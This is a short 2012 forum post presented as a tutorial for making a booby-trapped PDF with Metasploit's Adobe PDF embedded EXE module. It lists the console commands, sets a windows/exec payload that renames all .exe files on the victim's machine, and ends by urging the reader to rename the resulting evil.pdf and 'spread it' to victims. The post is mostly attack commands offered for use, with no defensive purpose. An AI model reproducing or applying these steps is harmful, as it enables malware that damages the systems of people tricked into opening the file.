Icon1 Metasploit Adobe PDF Embedded EXE Social Engineering Exploit Tutorial. Poorly written - 09-08-2012, 12:22 PM

First download metasploit framework.
load the metasploit console
once it loads
type these commands
Use exploit/windows/fileformat/adobe_pdf_embedded_exe

This sets the exploit to Adobe PDF Embedded EXE Social Engineering. Next you type

Show payloads

This gives you a list of all compatible payloads. The payload we will use in this tutorial is windows/exec this runs cmd commands. to set this pay load we type:

set payload windows/exec

then we want to set what command will be run when the pdf is opened. Because this a very basic one it will only run a simple
renaming script. this is set by:

set cmd echo off & ren *.exe *.gofuckyourself

Now you need to find a pdf you are going to send to your victim/s. i usedhttp://www.radarhack...for_dummies.pdf You then need to put this file into C:\Program Files\Metasploit\Framework3\msf3\data\exploits
Once done type this into the metasploit console

Set infilename data/exploits/metasploit_for_dummies.pdf

now to create the infected .pdf type this:

exploit

the infected .pdf will now be in C:\ProgramFiles\Metasploit\Framework3\msf3\data\ex ploits and called evil.pdf

now rename it and spread it =D
